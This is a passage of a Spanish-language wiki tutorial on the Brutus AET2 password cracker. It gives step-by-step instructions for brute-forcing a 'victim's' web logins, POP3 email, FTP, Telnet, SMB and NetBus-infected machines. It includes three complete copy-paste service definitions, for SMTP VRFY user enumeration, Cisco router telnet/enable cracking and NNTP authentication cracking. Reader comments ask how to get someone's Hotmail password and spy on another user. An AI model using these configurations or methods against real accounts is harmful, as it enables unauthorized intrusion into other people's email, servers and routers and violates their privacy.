Buscar Más buscado
Capitulos de este wiki
  1. 1 Manual del Brutus - AET2
  2. 2 Elección de servicio a atacar
  3. 3 Para acabar

Manual del Brutus - AET2 - Elección de servicio a atacar

2 - Elección de servicio a atacar

[editar]
Tutorial creado por Dragonjar.us. Extraido de: http://www.dragonjar.us
14 de Septiembre de 2005
< anterior | 1 2 3 | siguiente >
Las 2 primeras opciones HTTP se utilizan para entrar en esas paginas que al intentar acceder nos sale una ventana pidiendo login y pass utilizaremos uno u otro dependiendo del tipo de autentificacion que rekiera dicha web lo comprobaremos probando con ambos tipos., las HTTP "CGI application authentication" son las que usan programas CGIs, para autentificarse, ( podeis mirar el articulo de Problemas con los CGIs de NORTH que comenta un poco que son los cgis etc). Para utilizarlos no hay mas que poner en target por ej: www.victima.com o victima.com y seleccionar en autentifications options use username y pass mode el metodo ke mas nos convenga como norma general usaremos en este tipo de webs un dicionario del idioma en el ke este dicha web.
Esto es util sobre todo para esas webs xxx en las q rekieren ser socio para entrar claro esta q no sacaremos nada util de ellas unke estareis un rato entretenidos xDD.
POP3 bueno esto ya es algo mas interesante usaremos esta opcion para petar cuentas de correo de servidores q tenga pop3 activo. Selecionamos POP3 y en target escribimos POP3.victima.com por ejemplo:
(pop3.terra.es) o en su caso la ip, en autentification options marcamos use username y single user, y escribiremos en la casilla de userid victima.terra.es si la cuenta de la victima es (victima@terra.es). Lo escribiremos con punto(.) no arroba(@) y de nuevo usaremos el modo de pass q mas nos interese ya sea dicc, combo o brute force.
Bueno pasemos al ftp aunque como vereis la rutina es parecida en todos los tipos rekieren pequeñas variaciones en cada uno de ellos. En este caso nos convendra tener un nombre de usuario del que trataremos de sacar el pass aun q tambien podemos buscar nombres de usuario al azar, lo cual logicamente nos llevara mucho tiempo. Selecionamos type ftp y si tenemos un nombre de usuario marcaremos use username y single user escribiremos el nombre de usuario por ej: pardillo y selecionaremos el metodo dicc,combo... si no tenemos nombre de usuario selecionamos un diccionario y marcamos solo la casilla useusername.
TELNET - pues es facil lo haremos igual que con un ftp pero selecionando type telnet claro esta .
SMB (netBIOS) bueno aki tenemos otro servicio del cual tb podemos sacar provecho usando el brutus si es q esta protegido, cuanta gente piensa que este servicio lo dan solo maquinas con win lo habre oido mil veces, "na tio es un win tiene el 139 abierto" ,cuando hablamos de SMB"Server Message Block "SMB es un protocolo idea de IBM mientras desarrollaban un sistema basico de E/S para LANS, que luego se llamo NetBIOS, sobre el que luego IBM implemento una interfad mejorada de usuario, llamada NetBEUI. NetBIOS se puede transportar sobre diferentes protocolos de red: NetBEUI,IPX/SPX y TCP/IP, etc. tb se pueden ofrecer este servicio en otros sistemas unices, OS/2, BeOS etc, la unica cosa q tendremos q tener en cuenta a la hora de realizar nuestro atake, en target escribimos la ip de la victima selecionamos type SMB(netBIOS) y ahora en SMB options si se trata de una makina NT escribiremos el nombre del dominio si es solo un pc con win2 9x no marcaremos esta opcion, a continuacion en autentificacion options ya sabeis selecionaremos use username y el modo de pass q mas nos convenga.
NETBUS - he aki otra utilidad por si olvidamos el pass de alguna victima de netbus o simplemente queremos entrar en alguna que hemos encontrao y esta protegida con pass. Si conoceis este troyano sabreis que cuando lo proteges con pass para entrar solo se rekiere el pass no el login, por eso al seleccionar type netbus no podemos selecionar en autentifications options la opcion de use username o single user si no q solo podemos selecionar la opcion de pass (dicc, combo list ...) pues eso haremos lo cual no tiene mayor complicacion.
Ya hemos visto los types q trae el brutus de serie pero no nos vamos a kedar ahi, tb podemos crear nuevos types es decir preparar el brutus para q se conecte a un determinado servicio usando unas determinadanas instruciones q pondremos en el archivo q hagamos.
Ahora os voy a poner un ejemplo de como preparar nuevos types vamos a ver uno para (smtp_verificacion_de_usuario), en la web oficial podeis encontrar alguno, te preguntaras como se hacen pues simplemente viendo como verifica el servicio el nombre del usuario y la pass, o en algunos casos solo las pass, para ello puedes ayudarte un sniffer, netcat o cualquier cliente de telnet ya hablaremos de estas utilidades o utilidades parecidas en siguientes ezines.
Seria asi:
/
empieza_codigo
copiar_desde_aki
/
[Brutus Application Definition]
Version=AET2
Target=
Port=25
UseUserID=0
userprompt=login
passprompt=passwd
RespString=
HTTPRequestType=POST
useHTTPKeepAlive=1
posResponse=0
IsTelnet=0
IsHTTP=0
IsSMB=0
maPrimaryResponseIsPositive=0
maSecondaryResponseIsPositive=0
maPrimaryResponseAction=13
maSecondaryResponseAction=13
maUserPrefix=" "
maUserPostfix=" "
maPassPrefix="VRFY "
maPassPostfix=" "
maUsePreAuth=1
maMaxAuthsConx=0
HTTPFormFieldUpdate=0
HTTPUseCookies=1
HTTPCookieUpdate=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStrings1=" "
maauthReadLength1=1
maauthSendPostfix1=None
HTTPFormFields1=
HTTPFormFieldValues1=
maauthStageStrings2="220"
maauthReadLength2=1
maauthSendPostfix2=None
HTTPFormFields2=
HTTPFormFieldValues2=
maauthStageStrings3="HELO ."
maauthReadLength3=1
maauthSendPostfix3=CR+LF
HTTPFormFields3=
HTTPFormFieldValues3=
maauthStageStrings4=" "
maauthReadLength4=1
maauthSendPostfix4=None
HTTPFormFields4=
HTTPFormFieldValues4=
maauthStageStrings5=" "
maauthReadLength5=1
maauthSendPostfix5=None
HTTPFormFields5=
HTTPFormFieldValues5=
maauthStageStrings6=" "
maauthReadLength6=1
maauthSendPostfix6=None
HTTPFormFields6=
HTTPFormFieldValues6=
maauthStageStrings7=" "
maauthReadLength7=1
maauthSendPostfix7=None
HTTPFormFields7=
HTTPFormFieldValues7=
maauthStageStrings8=" "
maauthReadLength8=1
maauthSendPostfix8=None
HTTPFormFields8=
HTTPFormFieldValues8=
maauthStageStrings9=" "
maauthReadLength9=1
maauthSendPostfix9=None
HTTPFormFields9=
HTTPFormFieldValues9=
maauthStageStrings10=" "
maauthReadLength10=1
maauthSendPostfix10=None
HTTPFormFields10=
HTTPFormFieldValues10=
maauthStageStrings11=" "
maauthReadLength11=1
maauthSendPostfix11=None
HTTPFormFields11=
HTTPFormFieldValues11=
maauthStageStrings12="250"
maauthReadLength12=1
maauthSendPostfix12=None
HTTPFormFields12=
HTTPFormFieldValues12=
maauthStageStrings13=" "
maauthReadLength13=1
maauthSendPostfix13=CR+LF
HTTPFormFields13=
HTTPFormFieldValues13=
maauthStageStrings14="550"
maauthReadLength14=1
maauthSendPostfix14=None
HTTPFormFields14=
HTTPFormFieldValues14=
maauthStageStrings15="252"
maauthReadLength15=1
maauthSendPostfix15=None
HTTPFormFields15=
HTTPFormFieldValues15=
maauthStageStrings16=" "
maauthReadLength16=1
maauthSendPostfix16=None
HTTPFormFields16=
HTTPFormFieldValues16=
/
fin_de_codigo
copiar_hasta_aki
/
ara utilizar este codigo crearemos un archivo bad pegaremos en el el codigo y lo guardamos con el nombre q keramos por ej: smtp_b_auth.bad una vez guar dado solo hay que ir a File > Import Service y seleccionar el type, estos types los puedes configurar en Modify Sequence tb, ahi puedes cambiarlo a tu gusto el metodo o la forma de autentificacion, tiempo de espera etc , lo guardas con la configuracion que tu quieras en File > Export Service.
Este type lo ke hace es utilizar el comado VRFY "verify" (utilizado para verificar el nombre del usuario) que aunke suele estar desactivado en muchos server debido a que puede revelar informacion tambien otro comando que puede revelar informacion es EXPN (expand) sirve para indicar como se va a resolver la dirección de correo del RCPT que le indiquemos, aunque sea antiguo todavia hay algunos en los que no lo esta desactivado y lo que nos permitira es comprobar utilizando una lista o dicc de users comprobar cuales estan utlizados o no.
Veamos otro para atakar el password en un router CISCO
/
empieza_codigo
copiar_desde_aki
/
[Brutus Application Definition]
Version=AET2
Target=
Port=23
UseUserID=0
userprompt=
passprompt=
RespString=
HTTPRequestType=GET
useHTTPKeepAlive=1
posResponse=0
IsTelnet=1
IsHTTP=0
IsSMB=0
maPrimaryResponseIsPositive=0
maSecondaryResponseIsPositive=0
maPrimaryResponseAction=13
maSecondaryResponseAction=5
maUserPrefix=" "
maUserPostfix=" "
maPassPrefix=" "
maPassPostfix=" "
maUsePreAuth=1
maMaxAuthsConx=0
HTTPFormFieldUpdate=0
HTTPUseCookies=1
HTTPCookieUpdate=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStrings1=" "
maauthReadLength1=1
maauthSendPostfix1=None
HTTPFormFields1=
HTTPFormFieldValues1=
maauthStageStrings2="Password:"---maauthReadLength2=1---maauthSendPostfix2=None---HTTPFormFields2=---HTTPFormFieldValues2=---maauthStageStrings3="cisco"---maauthReadLength3=1---maauthSendPostfix3=CR+LF---HTTPFormFields3=---HTTPFormFieldValues3=---maauthStageStrings4=">"---maauthReadLength4=1---maauthSendPostfix4=None---HTTPFormFields4=---HTTPFormFieldValues4=---maauthStageStrings5="enable"---maauthReadLength5=1---maauthSendPostfix5=CR+LF---HTTPFormFields5=---HTTPFormFieldValues5=---maauthStageStrings6=" "
maauthReadLength6=1
maauthSendPostfix6=None
HTTPFormFields6=
HTTPFormFieldValues6=
maauthStageStrings7=" "
maauthReadLength7=1
maauthSendPostfix7=None
HTTPFormFields7=
HTTPFormFieldValues7=
maauthStageStrings8=" "
maauthReadLength8=1
maauthSendPostfix8=None
HTTPFormFields8=
HTTPFormFieldValues8=
maauthStageStrings9=" "
maauthReadLength9=1
maauthSendPostfix9=None
HTTPFormFields9=
HTTPFormFieldValues9=
maauthStageStrings10=" "
maauthReadLength10=1
maauthSendPostfix10=None
HTTPFormFields10=
HTTPFormFieldValues10=
maauthStageStrings11=" "
maauthReadLength11=1
maauthSendPostfix11=None
HTTPFormFields11=
HTTPFormFieldValues11=
maauthStageStrings12="Password:"---maauthReadLength12=1---maauthSendPostfix12=None---HTTPFormFields12=---HTTPFormFieldValues12=---maauthStageStrings13=" "
maauthReadLength13=1
maauthSendPostfix13=CR+LF
HTTPFormFields13=
HTTPFormFieldValues13=
maauthStageStrings14="Password:"---maauthReadLength14=1---maauthSendPostfix14=None---HTTPFormFields14=---HTTPFormFieldValues14=---maauthStageStrings15="% Bad passwords"
maauthReadLength15=1
maauthSendPostfix15=None
HTTPFormFields15=
HTTPFormFieldValues15=
maauthStageStrings16=" "
maauthReadLength16=1
maauthSendPostfix16=None
HTTPFormFields16=
HTTPFormFieldValues16=
/
fin_de_codigo
copiar_hasta_aki
/
Veamos otro mas para atakar el metodo de autentificacion que usan los servidores que proporcionan servicios nntpd "Network News Transfer Protocol", como podras observar en el codigo usa el puerto 119
/
empieza_codigo
copiar_desde_aki
/
[Brutus Application Definition]
Version=AET2
Target=
Port=119
UseUserID=1
userprompt=
passprompt=
RespString=
HTTPRequestType=POST
useHTTPKeepAlive=0
posResponse=0
IsTelnet=0
IsHTTP=0
IsSMB=0
maPrimaryResponseIsPositive=0
maSecondaryResponseIsPositive=1
maPrimaryResponseAction=0
maSecondaryResponseAction=0
maUserPrefix="AUTHINFO USER "
maUserPostfix=" "
maPassPrefix="AUTHINFO PASS "
maPassPostfix=" "
maUsePreAuth=0
maMaxAuthsConx=0
HTTPFormFieldUpdate=0
HTTPUseCookies=1
HTTPCookieUpdate=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStrings1=" "
maauthReadLength1=1
maauthSendPostfix1=None
HTTPFormFields1=
HTTPFormFieldValues1=
maauthStageStrings2=" "
maauthReadLength2=1
maauthSendPostfix2=None
HTTPFormFields2=
HTTPFormFieldValues2=
maauthStageStrings3=" "
maauthReadLength3=1
maauthSendPostfix3=None
HTTPFormFields3=
HTTPFormFieldValues3=
maauthStageStrings4=" "
maauthReadLength4=1
maauthSendPostfix4=None
HTTPFormFields4=
HTTPFormFieldValues4=
maauthStageStrings5=" "
maauthReadLength5=1
maauthSendPostfix5=None
HTTPFormFields5=
HTTPFormFieldValues5=
maauthStageStrings6=" "
maauthReadLength6=1
maauthSendPostfix6=None
HTTPFormFields6=
HTTPFormFieldValues6=
maauthStageStrings7=" "
maauthReadLength7=1
maauthSendPostfix7=None
HTTPFormFields7=
HTTPFormFieldValues7=
maauthStageStrings8=" "
maauthReadLength8=1
maauthSendPostfix8=None
HTTPFormFields8=
HTTPFormFieldValues8=
maauthStageStrings9=" "
maauthReadLength9=1
maauthSendPostfix9=None
HTTPFormFields9=
HTTPFormFieldValues9=
maauthStageStrings10="200"
maauthReadLength10=1
maauthSendPostfix10=None
HTTPFormFields10=
HTTPFormFieldValues10=
maauthStageStrings11=" "
maauthReadLength11=1
maauthSendPostfix11=CR+LF
HTTPFormFields11=
HTTPFormFieldValues11=
maauthStageStrings12="381"
maauthReadLength12=1
maauthSendPostfix12=None
HTTPFormFields12=
HTTPFormFieldValues12=
maauthStageStrings13=" "
maauthReadLength13=1
maauthSendPostfix13=CR+LF
HTTPFormFields13=
HTTPFormFieldValues13=
maauthStageStrings14="502"
maauthReadLength14=1
maauthSendPostfix14=None
HTTPFormFields14=
HTTPFormFieldValues14=
maauthStageStrings15="281"
maauthReadLength15=1
maauthSendPostfix15=None
HTTPFormFields15=
HTTPFormFieldValues15=
maauthStageStrings16=" "
maauthReadLength16=1
maauthSendPostfix16=None
HTTPFormFields16=
HTTPFormFieldValues16=
/
fin_de_codigo
copiar_hasta_aki
/
[editar]
< anterior | 1 2 3 | siguiente >

Opinar
26 opiniones

JKLUIS

QUIERO QUE ME DIGAN COMO INSTALO UN SISTEMA OPERATIVO EN UN CD
Dc.

(document. Location="http://img513.imageshack.us/img513/5317/dibujol.png").
Da resultados erróneos.

Hola, pués yo lo descargué de la página que parece oficial (www. Hoobie. Net/brutus/) y cuando lo hago funcionar me da resultados de combinaciones de usuario y contraseña con resultado positivo, pero yo cuando lo pruebo manualmente no supera el login. Luego pruebo con otros métodos en el brutus y da resultados diferentes. No funciona bién, no se si es esta versión que dan en esta página web o que... Pero fatal.
Password de hotmail.

Hola a todos, que alguien me ayude a conseguir un password de hotmail, en otra pc,o como puedo mirar lo que esta haciendo el otro usuario sin que lo sepa.
Sun
Gracias.

Exelente programa me ha sido de gran ayuda, una exelente herramienta para pequeños hakers, para los que no les funciona primero investiguen que tipo de tecnologia se utiliza para el login, y apliquen la mas apropiada, y veran que funciona, a pero no creo que puedan con microsoft (hotmail), o talves si pero no es muy sencillo y menos con windows, minimo unix, a y con mas herramientas, suerte.
1 2 3 4 5 6 | siguiente >

Tutoriales relacionados con 'Manual del Brutus - AET2'

Manual del Brutus - AET2
Hola a todos voy a hablaros de un programa con el que deberiais familiariza-ros, ya... Más »

Anuncios Google

Autor y licencia de 'Manual del Brutus - AET2'


Tutorial de Dragonjar.us. Extraido de: http://www.dragonjar.us CopyLeft
Este contenido ha sido recopilado por el equipo de Wikilearning. Todo el contenido recopilado se ha obtenido respetando y comunicando en nuestro site la licencia de cada fuente.
Wikilearning tiene permiso expreso por escrito de los autores para publicar los contenidos que ha extraído de otras webs, incluyendo su uso comercial.